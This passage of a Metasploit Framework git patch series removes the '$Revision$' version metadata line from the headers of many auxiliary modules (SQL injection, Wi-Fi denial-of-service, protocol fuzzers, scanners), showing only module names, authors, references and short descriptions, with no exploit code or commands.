a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index 7bb261541d..2adc8ff236 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2081' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 2636a28b18..b927ed215c 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index de976eb858..dca09dbefc 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index 948c6ba9c2..bf15b6e6b8 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index 1df9782e12..1850dd3021 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Sh2kerr ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3979' ], diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 4b21d8b2fc..3b858000ec 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0866'], diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 9707dfa236..723e2101dc 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0866'], diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 27ad1da422..06b4463732 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3982'], diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index a36eb94d08..baa82d5c57 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['CG'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5511'], diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 7f04f0c26f..a1152ef368 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3983'], diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index d8c7611edd..1177f1f591 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Sh2kerr ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3984' ], diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index 96eb296acc..68c8319599 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0978' ], diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index 3af668a06d..016d1487f4 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -12,7 +12,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VSploit Mariposa DNS Query Module', - 'Version' => '$Revision$', 'Description' => 'This module queries known Mariposa Botnet DNS records.', 'Author' => 'MJC', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index c751749aab..08eb17597d 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -13,7 +13,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VSploit DNS Beaconing Emulation', - 'Version' => '$Revision$', 'Description' => 'This module takes a list and emulates malicious DNS beaconing.', 'Author' => 'MJC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index b97daf1694..aef1be35e0 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -12,7 +12,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VSploit Zeus DNS Query Module', - 'Version' => '$Revision$', 'Description' => 'This module queries known Zeus Botnet DNS records.', 'Author' => 'MJC', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index f917092d62..f424b34746 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary 'Description' => 'This module emulates a webserver leaking PII data', 'License' => MSF_LICENSE, 'Author' => 'MJC', - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com'], From 4d8a2a08851aedcd2f2884e74ac9111fe1230bdd Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 3 Jan 2013 01:01:18 +0100 Subject: [PATCH 134/154] msftidy: remove $Revision$ --- modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb | 3 +-- modules/auxiliary/admin/mssql/mssql_enum.rb | 3 +-- modules/auxiliary/admin/mysql/mysql_sql.rb | 3 +-- modules/auxiliary/admin/oracle/oraenum.rb | 3 +-- modules/auxiliary/admin/postgres/postgres_readfile.rb | 3 +-- modules/auxiliary/admin/postgres/postgres_sql.rb | 3 +-- modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb | 3 +-- modules/auxiliary/dos/wifi/cts_rts_flood.rb | 3 +-- modules/auxiliary/dos/wifi/deauth.rb | 3 +-- modules/auxiliary/dos/wifi/fakeap.rb | 3 +-- modules/auxiliary/dos/wifi/file2air.rb | 3 +-- modules/auxiliary/dos/wifi/ssidlist_beacon.rb | 3 +-- modules/auxiliary/dos/wifi/wifun.rb | 3 +-- .../dos/windows/smb/ms10_006_negotiate_response_loop.rb | 3 +-- .../dos/windows/smb/ms10_054_queryfs_pool_overflow.rb | 3 +-- modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb | 3 +-- modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb | 3 +-- modules/auxiliary/fuzzers/http/http_get_uri_long.rb | 3 +-- modules/auxiliary/fuzzers/http/http_get_uri_strings.rb | 3 +-- modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/smb/smb_create_pipe.rb | 3 +-- modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/smb/smb_tree_connect.rb | 3 +-- modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/ssh/ssh_version_15.rb | 3 +-- modules/auxiliary/fuzzers/ssh/ssh_version_2.rb | 3 +-- modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb | 3 +-- modules/auxiliary/fuzzers/tds/tds_login_username.rb | 3 +-- modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb | 3 +-- modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb | 3 +-- modules/auxiliary/scanner/http/enum_wayback.rb | 3 +-- modules/auxiliary/scanner/ip/ipidseq.rb | 3 +-- modules/auxiliary/scanner/mysql/mysql_login.rb | 3 +-- modules/auxiliary/scanner/oracle/oracle_login.rb | 3 +-- modules/auxiliary/scanner/oracle/sid_brute.rb | 3 +-- modules/auxiliary/scanner/postgres/postgres_login.rb | 3 +-- modules/auxiliary/vsploit/pii/email_pii.rb | 3 +-- 41 files changed, 41 insertions(+), 82 deletions(-) diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index 6e9cfc753f..c15610dee7 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -27,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '60035'], ], 'Author' => 'hdm', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index 17d463a42a..ad63351a74 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary supplied. }, 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index a01bbb971f..d4a5dcb96d 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary against a MySQL instance given the appropriate credentials. }, 'Author' => [ 'Bernardo Damele A. G. ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 54b213a34e..355047acc7 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary run. }, 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index fd91946200..9a5d5b1bfb 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -27,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ] - ], - 'Version' => '$Revision$' + ] )) register_options( diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 4b87f51d52..a79f137279 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'www.postgresql.org' ] - ], - 'Version' => '$Revision$' + ] )) #register_options( [ ], self.class) # None needed. diff --git a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb index 213a0c6071..67a5ae6ee1 100644 --- a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb +++ b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb @@ -33,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ ['CVE', '2006-5710'], ['OSVDB', '30180'], - ], - 'Version' => '$Revision$' + ] )) register_options( [ diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 86c1735ea9..259c8cee7b 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary using the specified source address, }, 'Author' => [ 'Brad Antoniewicz' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb index 7c10104db9..e8eff6f2c6 100644 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ b/modules/auxiliary/dos/wifi/deauth.rb @@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Brad Antoniewicz' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/dos/wifi/fakeap.rb b/modules/auxiliary/dos/wifi/fakeap.rb index bd62c4bc75..11cc5780a7 100644 --- a/modules/auxiliary/dos/wifi/fakeap.rb +++ b/modules/auxiliary/dos/wifi/fakeap.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm', 'kris katterjohn' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb index 752e5cfb6a..d37be665ea 100644 --- a/modules/auxiliary/dos/wifi/file2air.rb +++ b/modules/auxiliary/dos/wifi/file2air.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, # 11/03/2008 'Author' => 'kris katterjohn', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb index bec86a8a93..74991ba58b 100644 --- a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb +++ b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb @@ -29,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'joswr1ght', 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/dos/wifi/wifun.rb b/modules/auxiliary/dos/wifi/wifun.rb index 186b273fe5..f0dca7ada4 100644 --- a/modules/auxiliary/dos/wifi/wifun.rb +++ b/modules/auxiliary/dos/wifi/wifun.rb @@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index b9ad315e8b..8bfc1d9a27 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -30,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary ['URL', 'http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html'] ], 'Author' => [ 'Laurent Gaffie ', 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index b4b114e4f9..add4fb4e1b 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -29,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary ['URL', 'http://seclists.org/fulldisclosure/2010/Aug/122'] ], 'Author' => [ 'Laurent Gaffie ', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 2f6044abbb..fb0a544949 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ] ], 'Author' => [ 'Cupidon-3005', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index df27a76719..0822d0655f 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary This module will connect to a FTP server and perform pre- and post-authentication fuzzing }, 'Author' => [ 'corelanc0d3r ', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE ) register_options( diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 73e9530a36..0c8f0c7333 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of HTTP GET request with incrementing URL lengths. }, 'Author' => [ 'nullthreat' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(80), diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index 2ec6877a1c..706a4c95ba 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of HTTP GET request with malicious URIs. }, 'Author' => [ 'nullthreat' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(80), diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index 5238b92149..daea66fac2 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary SMB2 dialect with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(445), diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 85b40bd192..011437f55a 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary requests using malicious strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 641eaa2531..3a7f406bc0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SMB create pipe requests with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']), diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index a4f3472827..b4f488dc49 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SMB negiotiate requests with corrupted bytes }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(445), diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index c13b8f52bd..1497b8b211 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary the NTLMv1 protocol with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(445), diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index 075dfdaa17..69cf68e858 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary requests using malicious strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index f1f10da97d..0b6417ecde 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SMB tree connect requests with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']), diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index ef10e279d8..410109b2a5 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with a corrupted initial key exchange payload. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22), diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index 8073335044..1c60e67a81 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with malicious version strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22) diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index 6e024449f6..6a4e1182c8 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with malicious version strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22) diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 68172b2e6d..a7fb440eed 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with a corrupted version string }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22), diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index ce7a76fd3d..6363a02233 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of malformed TDS login requests. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index 7f62f334ec..84aaed0623 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of malformed TDS login requests. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb index a88190c385..a58865133c 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb 